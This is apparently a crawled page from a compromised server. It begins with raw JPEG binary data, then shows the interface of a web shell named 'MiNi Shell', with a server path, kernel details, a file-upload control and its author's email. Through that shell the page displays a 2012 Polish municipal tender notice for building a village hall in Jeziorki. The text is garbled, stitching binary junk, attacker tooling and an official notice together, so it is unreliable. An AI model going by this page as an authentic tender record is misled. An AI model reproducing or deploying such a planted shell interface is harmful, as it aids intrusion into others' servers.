JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120727/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120727/274078-N-2012.html

<p class="kh_header"><b>Kaczory: Budowa sali wiejskiej z zapleczem w Jeziorkach</b><br>
<b>Numer ogłoszenia: 274078 - 2012; data zamieszczenia: 27.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Kaczory , ul. Dworcowa 22, 64-810 Kaczory, woj. wielkopolskie, tel. 67 2842371, 2842372, faks 67 2841233.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sali wiejskiej z zapleczem w Jeziorkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Na przedmiot zamówienia składają się roboty budowlane i instalacyjne związane z budową sali wiejskiej w miejscowości Jeziorki. 
Zakres robót obejmuje wykonanie obiektu parterowego z zapleczem socjalno-gospodarczym, dachem dwuspadowym o spadku 20 st. pokrytym blachą.
Dane techniczne obiektu:
- powierzchnia zabudowy projektowanego budynku - 407,33 m2,
- powierzchnia użytkowa - 314,26 m2,
- kubatura - 1472,00 m3.
Dane konstrukcyjno-materiałowe:
a) Fundamenty:
 - ławy fundamentowe żelbetowe prostokątne z betonu zwykłego B-20 o szer. 0,6-0,8 m,
- ściany budynków jednokondygnacyjnych o wys. do 4,5 m bloczków M-6 na zaprawie cementowo-wapiennej o gr. 25 cm,
- izolacje przeciwwilgociowe powierzchni poziomych i pionowych,
- tynki zwykłe kat. II na ścianach płaskich i powierzchniach poziomych,
- ocieplenie ścian budynku płytami styropianowymi EPS 042 gr. 8 cm,
- zbrojenie konstrukcji prętami stalowymi okrągłymi gładkimi StOS o śr. do 7 mm,
- zbrojenie konstrukcji prętami stalowymi okrągłymi żebrowanymi 34GS o śr. 10 do 14 mm.
b) Ściany parteru:
- ściany budynków z bloczków z betonu komórkowego  gr. 24 cm,
- ścianki działowe z betonu komórkowego o gr. 12 cm,
- nadproża prefabrykowane ,
- wieńce monolityczne z betonu zwykłego B-15 o szer. do 30 cm,
-  zbrojenie konstrukcji prętami stalowymi okrągłymi gładkimi StOS o śr. do 7 mm,
- zbrojenie konstrukcji prętami stalowymi okrągłymi żebrowanymi 34GS o śr. 10 do 14 mm,
- zbrojenie konstrukcji prętami stalowymi okrągłymi żebrowanymi 34GS o śr. 16 do 28 mm,
- słupy żelbetowe prostokątne z betonu zwykłego B-20 o wys. do 4 m,
- kotwy stalowe do mocowania dźwigarów i krokwi,
- kominy wolnostojące z cegieł budowlanych pełnych.
Dach nad salą:
- dach z wiązarów deskowych z tarcicy iglastej o rozpiętości 12,0 m,
- konstrukcja dachowa z tarcicy iglastej - murłaty o przekroju poprzecznym drewna do 180 cm2,
- konstrukcja dachowa z tarcicy iglastej - krokwie zwykłe o dł. ponad 4,5 m i przekroju poprzecznym drewna do 180 cm2,
- konstrukcja dachowa z tarcicy iglastej - krokwie narożne i koszowe o przekroju poprzecznym drewna do 180 cm2,
- konstrukcja dachowa z tarcicy iglastej - kleszcze o przekroju poprzecznym drewna do 180 cm2,
- konstrukcja dachowa z tarcicy iglastej - miecze i zastrzały o przekroju poprzecznym drewna do 180 cm,
- ołacenie połaci dachowych łatami iglastymi o przekroju 38x50 mm z wykonaniem i osadzeniem wyłazów dachowych i okienek dymnikowych,
- montaż w pokryciach z blachy powlekanej elementów wykończeniowych wiatrownic z blachy powlekanej, 
- pokrycie dachu blachą powlekaną trapezową. 
c) Dach nad tarasem:
- konstrukcja dachowa z tarcicy iglastej - słupy o dł. ponad 2 m i przekroju poprzecznym drewna ponad 180 cm2,
- konstrukcja dachowa z tarcicy iglastej - ramy górne i płatwie o dł. do 3 m i przekroju poprzecznym drewna ponad 180 cm 2,
- konstrukcja dachowa z tarcicy iglastej - miecze i zastrzały o przekroju poprzecznym drewna do 180 cm2,
- konstrukcja dachowa z tarcicy iglastej - krokiewki o przekroju poprzecznym drewna do 180 cm2,
- konstrukcja dachowa z tarcicy iglastej - kleszcze o przekroju poprzecznym drewna do 180 cm2,
- ołacenie połaci dachowych łatami iglastymi o przekroju 38x50 mm z wykonaniem i osadzeniem wyłazów dachowych i okienek dymnikowych, 
- montaż kotew pod słupy drewniane,
- izolacje cieplne i przeciwdźwiękowe poziome z płyt z wełny mineralnej, 
- okap z desek profilowanych o gr. 25 mm,
- rynny dachowe półokrągłe z blachy cynkowo - tytanowej,
- rury spustowe okrągłe z blachy cynkowo - tytanowej.
d) Podsufitka:
- konstrukcja dachowa z tarcicy iglastej - ramy górne i płatwie o dł. do 3 m
- ruszty podwójne,
- ekran zabezpieczający z folii,
- okładziny pojedyncze z płyt gipsowo - kartonowych.
e) Tynki wewnętrzne, malowanie, glazura:
- tynki zwykłe na ścianach i słupach,
- tynki wewnętrzne jednowarstwowe gr. 3 mm z gipsu szpachlowego,
- narożniki ochronne na narożach ścianek działowych z płyt gipsowych,
- listwy narożnikowe z PCV,
- malowanie farbą emulsyjną płyt i podłoży gipsowych.
f) Podłoża i posadzki:
- podkłady na podłożu gruntowym  wykonane z betonu,
- izolacje przeciwwilgociowe,
- izolacje cieplne i przeciwdźwiękowe poziome z płyt styropianowych,
- warstwy wyrównawcze pod posadzki z zaprawy cementowej,
- posadzki z płytek z kamieni sztucznych układanych na klej o wym. 30x30 cm,
- cokoliki z płytek z kamieni sztucznych o wym 10x10,
- panele podłogowe z płyty HDF, listwy przyścienne z drewna liściastego.
g) Stolarka okienna:
- okna rozwierane i uchylno-rozwierane z PCV,
- ścianki działowe z luksferów,
- nawiewniki higrosterowalne,
- parapety z płyty wiórowej.
Stolarka drzwiowa:
- skrzydła drzwiowe płytowe wewnętrzne,
- ościeżnice stalowe, 
- drzwi aluminiowe jednoskrzydłowe i dwuskrzydłowe zewnętrzne.
h) Wentylacje:
- nasady wentylacyjne blaszane,
- rury spiro zakończone kratką,
- kratki wentylacyjne.
i) Elewacja:
- ocieplenie ścian budynku płytami styropianowymi gr. 12 cm,
- warstwa siatki na ścianach,
- wyprawa elewacyjna cienkościenna z gotowej mieszanki.
Instalacje i przyłącza:
- instalacja wodno - kanalizacyjna,
- instalacja c.o., 
- przyłącza wodno-kanalizacyjne,
- instalacja gazowa z przyłączami,
- instalacja elektryczna wewnętrzna.
 Zagospodarowanie terenu:
- boisko sportowe,
- wyposażenie w sprzęt sportowy,
- place, chodniki z kostki brukowej betonowej,
- ogrodzenie z siatki na słupkach stalowych,
- ogrodzenie ozdobne,
- pergole z siedziskami.

Zakres ilościowy i rzeczowy określony jest w dokumentacji projektowej, stanowiącej załączniki do SIWZ.

Uwaga:
Termin wykonania całego zamówienia ustala się na dzień 30.07.2013 r., z zastrzeżeniem, że roboty składające się na stan surowy zamknięty ( roboty ziemne, fundamenty, ściany parteru, dach nad salą, dach nad tarasem, podsufitka, stolarka okienna, stolarka drzwiowa) oraz wentylacje muszą zostać wykonane do 10.12.2012 r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.11.12.91-4, 45.23.32.00-1, 45.34.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium ustala się w kwocie 12000,00 złotych.
Słownie : dwanaście tysięcy złotych.
Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego: Bank Spółdzielczy w Kaczorach,
Nr rachunku : 82 8945 0002 0010 0120 2000 0050,
  z dopiskiem na blankiecie przelewu: wadium na zabezpieczenie oferty przetargowej zadania:  
Budowa sali wiejskiej z zapleczem w Jeziorkach

Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć do oferty. 
1.	Wadium może być wnoszone we wszystkich formach dopuszczonych w ustawie Prawo zamówień publicznych.
2.	Wadium musi być wniesione nie później niż do  wyznaczonego terminu składania ofert. 
3.	Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie rachunek bankowy Zamawiającego zostanie uznany pełną kwotą wymaganego wadium.
4.	Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium w wyznaczonym terminie zostanie wykluczony z postępowania, a jego oferta zostanie odrzucona.
5.	Zamawiający zwróci niezwłocznie wadium wszystkim Wykonawcom po wyborze oferty najkorzystniejszej, z wyjątkiem Wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp.
6.	Zamawiający zwróci niezwłocznie wadium wszystkim Wykonawcom po unieważnieniu postępowania o udzielenie niniejszego zamówienia publicznego, pod warunkiem, iż odwołanie zostało ostatecznie rozstrzygnięte lub upłynął termin do wnoszenia.
7.	Zamawiający będzie żądał ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium w sytuacji, jak w pkt. 9, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez Zamawiającego.
8.	W przypadku wniesienia odwołania, Zamawiający nie później niż na 7 dni przed upływem ważności wadium, wezwie Wykonawców, pod rygorem wykluczenia z postępowania, do przedłużenia ważności wadium albo wniesienia nowego wadium na okres niezbędny do zabezpieczenia postępowania do zawarcia umowy. Jeżeli odwołanie wniesiono po wyborze oferty najkorzystniejszej, wezwanie skieruje jedynie do wykonawcy, którego ofertę wybrano jako najkorzystniejszą.
9.	Zatrzymanie wadium nastąpi w okolicznościach :
a)	jeżeli Wykonawca w odpowiedzi na wezwanie, o  którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, 
b)	jeżeli Wykonawca odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
c)	jeżeli Wykonawca był zobowiązany i nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
d)	jeżeli zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunku: ocena spełniania warunku dokonana będzie na podstawie załączonego przez Wykonawcę do oferty oświadczenia (zał. nr 2 do SIWZ), z treści którego wynikać będą informacje potwierdzające spełnienie warunku.
            Ocena będzie dokonana na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym względzie wykażą i udokumentują (referencjami, opiniami lub listami polecającymi), iż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w ciągu całego okresu prowadzenia działalności wykonali roboty budowlane w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, przez co należy rozumieć wykonanie min. dwóch robót o wartości nie mniejszej niż 400 tys. zł brutto każda.
Wykonawca może polegać na wiedzy i doświadczeniu innego lub innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunku. W takiej sytuacji wykonawca zobowiązany będzie udowodnić, iż będzie dysponował wiedzą i doświadczeniem niezbędnym do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania do dyspozycji prawo korzystania z ich wiedzy i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia. 
Opis sposobu dokonywania oceny spełniania warunku.
Ocena spełnienia warunku dokonana będzie na podstawie załączonych przez wykonawcę do oferty oświadczeń (zał. nr 2 do SIWZ) i dokumentów, z treści których wynikać będą informacje potwierdzające spełnianie warunku. 
Ocena będzie dokonywana na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dokonana będzie na podstawie złożonego oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnieni, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
Ocena będzie dokonywana na zasadzie spełnia - nie spełnia. 
Wykonawca może polegać na potencjale technicznym i osobach zdolnych do wykonania zamówienia innego lub innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunku. W takiej sytuacji wykonawca zobowiązany będzie udowodnić, iż będzie dysponował tymi zasobami w zakresie niezbędnym do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania do dyspozycji prawo korzystania z ich zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dokonana będzie na podstawie złożonego oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnieni, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
Ocena będzie dokonywana na zasadzie spełnia - nie spełnia. 
Wykonawca może polegać na potencjale technicznym i osobach zdolnych do wykonania zamówienia innego lub innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunku. W takiej sytuacji wykonawca zobowiązany będzie udowodnić, iż będzie dysponował tymi zasobami w zakresie niezbędnym do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania do dyspozycji prawo korzystania z ich zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana będzie na podstawie załączonego przez Wykonawcę do oferty oświadczenia (zał. nr 2 do SIWZ), z treści którego wynikać będą informacje potwierdzające spełnienie warunku.
             Ocena będzie dokonana na zasadzie spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">atesty na wbudowane materiały</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy(zał. nr 1 do SIWZ),kopia dowodu wniesienia wadium, kosztorys ofertowy, oświadczenie o okresie udzielenia na wykonane roboty min. 3 lat gwarancji</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do  treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej:
1.  zmiana terminu realizacji zamówienia
	a) zmiany spowodowane warunkami atmosferycznymi, w szczególności:
	- klęski żywiołowe,
	- warunki atmosferyczne uniemożliwiające prowadzenie prac, dokonywanie odbiorów
b)	zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności wstrzymanie robót przez Zamawiającego.
W przypadku wystąpienia którejkolwiek z ww. okoliczności termin wykonania zamówienia może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania jego przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. Zmiana postanowień umowy może być dokonana tylko w formie pisemnego aneksu, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.kaczory.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedziebie Zamawiającego: Urząd Gminy Kaczory, ul. Dworcowa 22, 64-810 Kaczory.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2012 godzina 10:00, miejsce: siedziba Zamawiającego: Urząd Gminy Kaczory, ul. Dworcowa 22, 64-810 Kaczory, biuro nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt będzie wspófinansowany ze środków Unii Europejskiej - Program Rozwoju Obszarów Wiejskich na lata 2007-2013, działanie 313, 322, 323 - Odnowa i rozwój wsi..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com